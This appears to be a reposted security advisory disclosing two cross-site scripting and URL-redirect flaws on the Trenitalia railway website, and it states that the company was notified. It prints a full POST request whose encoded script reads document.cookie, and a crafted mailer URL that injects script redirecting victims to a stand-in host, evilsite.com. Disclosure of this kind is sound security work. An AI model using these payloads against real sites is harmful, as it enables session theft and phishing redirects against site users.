Trenitalia.com is susceptible to cross site scripting and redirection attacks.
d0d68b819e02b16d42f2917b18eacfe779c4a275a9e23e6d0d45858cc4c1f994[-] Overview
Trenitalia.com is the website of the most important railway company in
Italy.
In this website, I've been discovered two vulnerabilities that allow
attacker to
execute arbitrary javascript code via XSS or URL redirect.
[-] Vulnerability Description
In the first vulnerability, it's necessary to sending POST request, adding
in POSTDATA textfield variable arbitrary HTML commands as following:
POST
http://www.ferroviedellostato.it/ferrovie/v/index.jsp?vgnextoid=c813055409b8
c010VgnVCM1001002f2af90aRCRD
Host=www.ferroviedellostato.it
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.5)
Gecko/20070713 Firefox/2.0.0.5
Accept= */*
Accept-Language= it
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Connection=keep-alive
Referer=http://www.ferroviedellostato.it/
Cookie=JSESSIONID=0000K_6eq2u2Z8MaLviVwAgmxu1:123p65u0i
Content-Type=application/x-www-form-urlencoded
Content-Length=63
POSTDATA=textfield=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
------ - - - - - - - - -
In the second one, the ffss_mailer.jsp page generates a mail form to send
an invite to friend, but it allows user to add in textfield variable
arbitraty HTML code, creating a malicious mail that contains URL redirect
or XSS attack:
this is an example ( evilsite.com must be replaced with the site to
redirect )
http://www.ferroviedellostato.it/ferrovie/mails/ffss_mailer.jsp?vgnextoid=c8
13055209b8c010VgnVCM1000002f2af90aRCRD&textfield=</span></p>%3Cscript%3Eloca
tion.href='http://evilsite.com'%3C/script%3E',%20\'width=516,height=255,stat
us=yes',%20'width=516,height=255,status=yes
[-] Additional Information
Vulnerability screenshots are available at these URLs:
http://exploit.blogosfere.it/images/trenitaliamail.jpg/screenMail.jpg
http://exploit.blogosfere.it/images/trenitaliaMainPage.jpg/trenitaliaPage.jp
g
[-] Company Notification
Trenitalia.com has been notified
[-] Credits
The vulnerability was discovered by Davide Denicolo
Davide Denicolo
davide <~@~> securityinfos < . > com
http://exploit.blogosfere.it
--------------------------------------------------------------------
mail2web LIVE – Free email based on Microsoft® Exchange technology -
http://link.mail2web.com/LIVE
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed